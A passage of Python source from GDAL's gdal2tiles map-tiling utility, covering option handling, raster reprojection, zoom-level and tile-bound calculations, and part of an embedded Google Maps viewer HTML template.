webviewer='all', copyright='', resampling='average', resume=False,
googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE',
processes=1)
return p
def process_args(argv):
parser = optparse_init()
options, args = parser.parse_args(args=argv)
# Args should be either an input file OR an input file and an output folder
if not args:
exit_with_error("You need to specify at least an input file as argument to the script")
if len(args) > 2:
exit_with_error("Processing of several input files is not supported.",
"Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the "
"files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(args))
input_file = args[0]
if not os.path.isfile(input_file):
exit_with_error("The provided input file %s does not exist or is not a file" % input_file)
if len(args) == 2:
output_folder = args[1]
else:
# Directory with input filename without extension in actual directory
output_folder = os.path.splitext(os.path.basename(input_file))[0]
options = options_post_processing(options, input_file, output_folder)
return input_file, output_folder, options
def options_post_processing(options, input_file, output_folder):
if not options.title:
options.title = os.path.basename(input_file)
if options.url and not options.url.endswith('/'):
options.url += '/'
if options.url:
out_path = output_folder
if out_path.endswith("/"):
out_path = out_path[:-1]
options.url += os.path.basename(out_path) + '/'
# Supported options
if options.resampling == 'antialias' and not numpy_available:
exit_with_error("'antialias' resampling algorithm is not available.",
"Install PIL (Python Imaging Library) and numpy.")
try:
os.path.basename(input_file).encode('ascii')
except UnicodeEncodeError:
full_ascii = False
else:
full_ascii = True
# LC_CTYPE check
if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""):
if not options.quiet:
print("\nWARNING: "
"You are running gdal2tiles.py with a LC_CTYPE environment variable that is "
"not UTF-8 compatible, and your input file contains non-ascii characters. "
"The generated sample googlemaps, openlayers or "
"leaflet files might contain some invalid characters as a result\n")
# Output the results
if options.verbose:
print("Options:", options)
print("Input:", input_file)
print("Output:", output_folder)
print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024))
print('')
return options
class TileDetail(object):
tx = 0
ty = 0
tz = 0
rx = 0
ry = 0
rxsize = 0
rysize = 0
wx = 0
wy = 0
wxsize = 0
wysize = 0
querysize = 0
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __str__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __repr__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
class TileJobInfo(object):
"""
Plain object to hold tile job configuration for a dataset
"""
src_file = ""
nb_data_bands = 0
output_file_path = ""
tile_extension = ""
tile_size = 0
tile_driver = None
kml = False
tminmax = []
tminz = 0
tmaxz = 0
in_srs_wkt = 0
out_geo_trans = []
ominy = 0
is_epsg_4326 = False
options = None
exclude_transparent = False
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __str__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __repr__(self):
return "TileJobInfo %s\n" % (self.src_file)
class Gdal2TilesError(Exception):
pass
class GDAL2Tiles(object):
def __init__(self, input_file, output_folder, options):
"""Constructor function - initialization"""
self.out_drv = None
self.mem_drv = None
self.warped_input_dataset = None
self.out_srs = None
self.nativezoom = None
self.tminmax = None
self.tsize = None
self.mercator = None
self.geodetic = None
self.alphaband = None
self.dataBandsCount = None
self.out_gt = None
self.tileswne = None
self.swne = None
self.ominx = None
self.omaxx = None
self.omaxy = None
self.ominy = None
self.input_file = None
self.output_folder = None
self.isepsg4326 = None
self.in_srs_wkt = None
# Tile format
self.tile_size = 256
self.tiledriver = 'PNG'
self.tileext = 'png'
self.tmp_dir = tempfile.mkdtemp(prefix = '', dir = options.tmpdir)
self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt')
# Should we read bigger window of the input raster and scale it down?
# Note: Modified later by open_input()
# Not for 'near' resampling
# Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
# Not for 'raster' profile
self.scaledquery = True
# How big should be query window be for scaling down
# Later on reset according the chosen resampling algorightm
self.querysize = 4 * self.tile_size
# Should we use Read on the input file for generating overview tiles?
# Note: Modified later by open_input()
# Otherwise the overview tiles are generated from existing underlying tiles
self.overviewquery = False
self.input_file = input_file
self.output_folder = output_folder
self.options = options
if self.options.resampling == 'near':
self.querysize = self.tile_size
elif self.options.resampling == 'bilinear':
self.querysize = self.tile_size * 2
# User specified zoom levels
self.tminz = None
self.tmaxz = None
if self.options.zoom:
minmax = self.options.zoom.split('-', 1)
minmax.extend([''])
zoom_min, zoom_max = minmax[:2]
self.tminz = int(zoom_min)
if zoom_max:
self.tmaxz = int(zoom_max)
else:
self.tmaxz = int(zoom_min)
# KML generation
self.kml = self.options.kml
# -------------------------------------------------------------------------
def open_input(self):
"""Initialization of the input raster, reprojection if necessary"""
gdal.AllRegister()
self.out_drv = gdal.GetDriverByName(self.tiledriver)
self.mem_drv = gdal.GetDriverByName('MEM')
if not self.out_drv:
raise Exception("The '%s' driver was not found, is it available in this GDAL build?" %
self.tiledriver)
if not self.mem_drv:
raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?")
# Open the input file
if self.input_file:
input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)
else:
raise Exception("No input file was specified")
if self.options.verbose:
print("Input file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
if not input_dataset:
# Note: GDAL prints the ERROR message too
exit_with_error("It is not possible to open the input file '%s'." % self.input_file)
# Read metadata from the input file
if input_dataset.RasterCount == 0:
exit_with_error("Input file '%s' has no raster band" % self.input_file)
if input_dataset.GetRasterBand(1).GetRasterColorTable():
exit_with_error(
"Please convert this file to RGB/RGBA and run gdal2tiles on the result.",
"From paletted file you can create RGBA file (temp.vrt) by:\n"
"gdal_translate -of vrt -expand rgba %s temp.vrt\n"
"then run:\n"
"gdal2tiles temp.vrt" % self.input_file
)
in_nodata = setup_no_data_values(input_dataset, self.options)
if self.options.verbose:
print("Preprocessed file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)
self.out_srs = setup_output_srs(in_srs, self.options)
# If input and output reference systems are different, we reproject the input dataset into
# the output reference system for easier manipulation
self.warped_input_dataset = None
if self.options.profile in ('mercator', 'geodetic'):
if not in_srs:
exit_with_error(
"Input file has unknown SRS.",
"Use --s_srs ESPG:xyz (or similar) to provide source reference system.")
if not has_georeference(input_dataset):
exit_with_error(
"There is no georeference - neither affine transformation (worldfile) "
"nor GCPs. You can generate only 'raster' profile tiles.",
"Either gdal2tiles with parameter -p 'raster' or use another GIS "
"software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs"
)
if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or
(input_dataset.GetGCPCount() != 0)):
self.warped_input_dataset = reproject_dataset(
input_dataset, in_srs, self.out_srs)
if in_nodata:
self.warped_input_dataset = update_no_data_values(
self.warped_input_dataset, in_nodata, options=self.options)
else:
self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(
self.warped_input_dataset, options=self.options)
if self.warped_input_dataset and self.options.verbose:
print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % (
self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize,
self.warped_input_dataset.RasterCount))
if not self.warped_input_dataset:
self.warped_input_dataset = input_dataset
gdal.GetDriverByName('VRT').CreateCopy(self.tmp_vrt_filename,
self.warped_input_dataset)
# Get alpha band (either directly or from NODATA value)
self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()
self.dataBandsCount = nb_data_bands(self.warped_input_dataset)
# KML test
self.isepsg4326 = False
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():
self.kml = True
self.isepsg4326 = True
if self.options.verbose:
print("KML autotest OK!")
# Read the georeference
self.out_gt = self.warped_input_dataset.GetGeoTransform()
# Test the size of the pixel
# Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)
if (self.out_gt[2], self.out_gt[4]) != (0, 0):
exit_with_error("Georeference of the raster contains rotation or skew. "
"Such raster is not supported. Please use gdalwarp first.")
# Here we expect: pixel is square, no rotation on the raster
# Output Bounds - coordinates in the output SRS
self.ominx = self.out_gt[0]
self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]
self.omaxy = self.out_gt[3]
self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]
# Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15
if self.options.verbose:
print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)
# Calculating ranges for tiles in different zoom levels
if self.options.profile == 'mercator':
self.mercator = GlobalMercator()
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.mercator.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**tz - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = self.mercator.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):",
self.mercator.MetersToLatLon(self.ominx, self.ominy),
self.mercator.MetersToLatLon(self.omaxx, self.omaxy))
print('MinZoomLevel:', self.tminz)
print("MaxZoomLevel:",
self.tmaxz,
"(",
self.mercator.Resolution(self.tmaxz),
")")
if self.options.profile == 'geodetic':
self.geodetic = GlobalGeodetic(self.options.tmscompatible)
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.geodetic.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**(tz + 1) - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tminz is None:
self.tminz = self.geodetic.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy)
if self.options.profile == 'raster':
def log2(x):
return math.log10(x) / math.log10(2)
self.nativezoom = int(
max(math.ceil(log2(self.warped_input_dataset.RasterXSize / float(self.tile_size))),
math.ceil(log2(self.warped_input_dataset.RasterYSize / float(self.tile_size)))))
if self.options.verbose:
print("Native zoom of the raster:", self.nativezoom)
# Get the minimal zoom level (whole raster in one tile)
if self.tminz is None:
self.tminz = 0
# Get the maximal zoom level (native resolution of the raster)
if self.tmaxz is None:
self.tmaxz = self.nativezoom
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, self.tmaxz + 1))
self.tsize = list(range(0, self.tmaxz + 1))
for tz in range(0, self.tmaxz + 1):
tsize = 2.0**(self.nativezoom - tz) * self.tile_size
tminx, tminy = 0, 0
tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1
tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1
self.tsize[tz] = math.ceil(tsize)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# Function which generates SWNE in LatLong for given tile
if self.kml and self.in_srs_wkt:
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2**(self.tmaxz - z) * self.out_gt[1]) # X-pixel size in level
west = self.out_gt[0] + x * self.tile_size * pixelsizex
east = west + self.tile_size * pixelsizex
south = self.ominy + y * self.tile_size * pixelsizex
north = south + self.tile_size * pixelsizex
if not self.isepsg4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
self.tileswne = rastertileswne
else:
self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa
def generate_metadata(self):
"""
Generation of main metadata files and HTML viewers (metadata related to particular
tiles are generated during the tile processing).
"""
if not os.path.exists(self.output_folder):
os.makedirs(self.output_folder)
if self.options.profile == 'mercator':
south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy)
north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy)
south, west = max(-85.05112878, south), max(-180.0, west)
north, east = min(85.05112878, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate googlemaps.html
if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator':
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))):
with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f:
f.write(self.generate_googlemaps().encode('utf-8'))
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate leaflet.html
if self.options.webviewer in ('all', 'leaflet'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))):
with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f:
f.write(self.generate_leaflet().encode('utf-8'))
elif self.options.profile == 'geodetic':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
south, west = max(-90.0, south), max(-180.0, west)
north, east = min(90.0, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
elif self.options.profile == 'raster':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate tilemapresource.xml.
if not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'tilemapresource.xml')):
with open(os.path.join(self.output_folder, 'tilemapresource.xml'), 'wb') as f:
f.write(self.generate_tilemapresource().encode('utf-8'))
if self.kml:
# TODO: Maybe problem for not automatically generated tminz
# The root KML should contain links to all tiles in the tminz level
children = []
xmin, ymin, xmax, ymax = self.tminmax[self.tminz]
for x in range(xmin, xmax + 1):
for y in range(ymin, ymax + 1):
children.append([x, y, self.tminz])
# Generate Root KML
if self.kml:
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'doc.kml'))):
with open(os.path.join(self.output_folder, 'doc.kml'), 'wb') as f:
f.write(generate_kml(
None, None, None, self.tileext, self.tile_size, self.tileswne,
self.options, children
).encode('utf-8'))
def generate_base_tiles(self):
"""
Generation of the base tiles (the lowest in the pyramid) directly from the input raster
"""
if not self.options.quiet:
print("Generating Base Tiles:")
if self.options.verbose:
print('')
print("Tiles generated from the max zoom level:")
print("----------------------------------------")
print('')
# Set the bounds
tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]
ds = self.warped_input_dataset
tilebands = self.dataBandsCount + 1
querysize = self.querysize
if self.options.verbose:
print("dataBandsCount: ", self.dataBandsCount)
print("tilebands: ", tilebands)
tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
tile_details = []
tz = self.tmaxz
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
tilefilename = os.path.join(
self.output_folder, str(tz), str(tx), "%s.%s" % (ty, self.tileext))
if self.options.verbose:
print(ti, '/', tcount, tilefilename)
if self.options.resume and os.path.exists(tilefilename):
if self.options.verbose:
print("Tile generation skipped because of --resume")
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
if self.options.profile == 'mercator':
# Tile bounds in EPSG:3857
b = self.mercator.TileBounds(tx, ty, tz)
elif self.options.profile == 'geodetic':
b = self.geodetic.TileBounds(tx, ty, tz)
# Don't scale up by nearest neighbour, better change the querysize
# to the native resolution (and return smaller query tile) for scaling
if self.options.profile in ('mercator', 'geodetic'):
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])
# Pixel size in the raster covering query geo extent
nativesize = wb[0] + wb[2]
if self.options.verbose:
print("\tNative Extent (querysize", nativesize, "): ", rb, wb)
# Tile bounds in raster coordinates for ReadRaster query
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)
rx, ry, rxsize, rysize = rb
wx, wy, wxsize, wysize = wb
else: # 'raster' profile:
tsize = int(self.tsize[tz]) # tile_size in raster coordinates for actual zoom
xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels
ysize = self.warped_input_dataset.RasterYSize
if tz >= self.nativezoom:
querysize = self.tile_size
rx = (tx) * tsize
rxsize = 0
if tx == tmaxx:
rxsize = xsize % tsize
if rxsize == 0:
rxsize = tsize
rysize = 0
if ty == tmaxy:
rysize = ysize % tsize
if rysize == 0:
rysize = tsize
ry = ysize - (ty * tsize) - rysize
wx, wy = 0, 0
wxsize = int(rxsize / float(tsize) * self.tile_size)
wysize = int(rysize / float(tsize) * self.tile_size)
if wysize != self.tile_size:
wy = self.tile_size - wysize
# Read the source raster if anything is going inside the tile as per the computed
# geo_query
tile_details.append(
TileDetail(
tx=tx, ty=ty, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,
wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,
)
)
conf = TileJobInfo(
src_file=self.tmp_vrt_filename,
nb_data_bands=self.dataBandsCount,
output_file_path=self.output_folder,
tile_extension=self.tileext,
tile_driver=self.tiledriver,
tile_size=self.tile_size,
kml=self.kml,
tminmax=self.tminmax,
tminz=self.tminz,
tmaxz=self.tmaxz,
in_srs_wkt=self.in_srs_wkt,
out_geo_trans=self.out_gt,
ominy=self.ominy,
is_epsg_4326=self.isepsg4326,
options=self.options,
exclude_transparent=self.options.exclude_transparent,
)
return conf, tile_details
def geo_query(self, ds, ulx, uly, lrx, lry, querysize=0):
"""
For given dataset and query in cartographic coordinates returns parameters for ReadRaster()
in raster coordinates and x/y shifts (for border tiles). If the querysize is not given, the
extent is returned in the native resolution of dataset ds.
raises Gdal2TilesError if the dataset does not contain anything inside this geo_query
"""
geotran = ds.GetGeoTransform()
rx = int((ulx - geotran[0]) / geotran[1] + 0.001)
ry = int((uly - geotran[3]) / geotran[5] + 0.001)
rxsize = int((lrx - ulx) / geotran[1] + 0.5)
rysize = int((lry - uly) / geotran[5] + 0.5)
if not querysize:
wxsize, wysize = rxsize, rysize
else:
wxsize, wysize = querysize, querysize
# Coordinates should not go out of the bounds of the raster
wx = 0
if rx < 0:
rxshift = abs(rx)
wx = int(wxsize * (float(rxshift) / rxsize))
wxsize = wxsize - wx
rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize))
rx = 0
if rx + rxsize > ds.RasterXSize:
wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize))
rxsize = ds.RasterXSize - rx
wy = 0
if ry < 0:
ryshift = abs(ry)
wy = int(wysize * (float(ryshift) / rysize))
wysize = wysize - wy
rysize = rysize - int(rysize * (float(ryshift) / rysize))
ry = 0
if ry + rysize > ds.RasterYSize:
wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize))
rysize = ds.RasterYSize - ry
return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)
def generate_tilemapresource(self):
"""
Template for tilemapresource.xml. Returns filled string. Expected variables:
title, north, south, east, west, isepsg4326, projection, publishurl,
zoompixels, tile_size, tileformat, profile
"""
args = {}
args['title'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['profile'] = self.options.profile
if self.options.profile == 'mercator':
args['srs'] = "EPSG:3857"
elif self.options.profile == 'geodetic':
args['srs'] = "EPSG:4326"
elif self.options.s_srs:
args['srs'] = self.options.s_srs
elif self.out_srs:
args['srs'] = self.out_srs.ExportToWkt()
else:
args['srs'] = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0">
<Title>%(title)s</Title>
<Abstract></Abstract>
<SRS>%(srs)s</SRS>
<BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/>
<Origin x="%(west).14f" y="%(south).14f"/>
<TileFormat width="%(tile_size)d" height="%(tile_size)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/>
<TileSets profile="%(profile)s">
""" % args # noqa
for z in range(self.tminz, self.tmaxz + 1):
if self.options.profile == 'raster':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, (2**(self.nativezoom - z) * self.out_gt[1]), z)
elif self.options.profile == 'mercator':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 156543.0339 / 2**z, z)
elif self.options.profile == 'geodetic':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 0.703125 / 2**z, z)
s += """ </TileSets>
</TileMap>
"""
return s
def generate_googlemaps(self):
"""
Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, googlemapskey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat,
publishurl
"""
args = {}
args['title'] = self.options.title
args['googlemapskey'] = self.options.googlekey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
</style>
<script src='http://maps.google.com/maps?file=api&v=2&key=%(googlemapskey)s'></script>
<script>
//<![CDATA[
/*
* Constants for given map
* TODO: read it from tilemapresource.xml
*/
var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s));
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var opacity = 0.75;
var map;
var hybridOverlay;
/*
* Create a Custom Opacity GControl
* http://www.maptiler.org/google-maps-overlay-opacity-control/
*/
var CTransparencyLENGTH = 58;
// maximum width that the knob can move (slide width minus knob width)
function CTransparencyControl( overlay ) {
this.overlay = overlay;
this.opacity = overlay.getTileLayer().getOpacity();
}
CTransparencyControl.prototype = new GControl();
// This function positions the slider to match the specified opacity
CTransparencyControl.prototype.setSlider = function(pos) {
var left = Math.round((CTransparencyLENGTH*pos));
this.slide.left = left;
this.knob.style.left = left+"px";
this.knob.style.top = "0px";
}
// This function reads the slider and sets the overlay opacity level
CTransparencyControl.prototype.setOpacity = function() {
// set the global variable
opacity = this.slide.left/CTransparencyLENGTH;
this.map.clearOverlays();
this.map.addOverlay(this.overlay, { zPriority: 0 });
if (this.map.getCurrentMapType() == G_HYBRID_MAP) {
this.map.addOverlay(hybridOverlay);
}
}
// This gets called by the API when addControl(new CTransparencyControl())
CTransparencyControl.prototype.initialize = function(map) {
var that=this;
this.map = map;
// Is this MSIE, if so we need to use AlphaImageLoader
var agent = navigator.userAgent.toLowerCase();
if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false}
// create the background graphic as a <div> containing an image
var container = document.createElement("div");
container.style.width="70px";
container.style.height="21px";
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>';
} else {
container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>';
}
// create the knob as a GDraggableObject
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.overflow="hidden";
this.knob_img = document.createElement("div");
this.knob_img.style.height="21px";
this.knob_img.style.width="83px";
this.knob_img.style.filter=loader;
this.knob_img.style.position="relative";
this.knob_img.style.left="-70px";
this.knob.appendChild(this.knob_img);
} else {
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)";
this.knob.style.backgroundPosition="-70px 0px";
}
container.appendChild(this.knob);
this.slide=new GDraggableObject(this.knob, {container:container});
this.slide.setDraggableCursor('pointer');
this.slide.setDraggingCursor('pointer');
this.container = container;
// attach the control to the map
map.getContainer().appendChild(container);
// init slider
this.setSlider(this.opacity);
// Listen for the slider being moved and set the opacity
GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()});
//GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) });
return container;
}
// Set the default position for the control
CTransparencyControl.prototype.getDefaultPosition = function() {
return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47));
}
/*
* Full-screen Window Resize
*/
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
// map.checkResize();
}
/*
* Main load function:
*/
function load() {
if (GBrowserIsCompatible()) {
// Bug in the Google Maps: Copyright for Overlay is not correctly displayed
var gcr = GMapType.prototype.getCopyrights;
GMapType.prototype.getCopyrights = function(bounds,zoom) {
return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom));
}
map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } );
map.addMapType(G_PHYSICAL_MAP);
map.setMapType(G_PHYSICAL_MAP);
map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds ));
hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] );
GEvent.addListener(map, "maptypechanged", function() {
if (map.getCurrentMapType() == G_HYBRID_MAP) {
map.addOverlay(hybridOverlay);
} else {
map.removeOverlay(hybridOverlay);
}
} );
var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom);
var mercator = new GMercatorProjection(mapMaxZoom+1);
tilelayer.getTileUrl = function(tile,zoom) {
if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) {
return "http://www.maptiler.org/img/none.png";
}
var ymax = 1 << zoom;
var y = ymax - tile.y -1;
var tileBounds = new GLatLngBounds(
mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ),
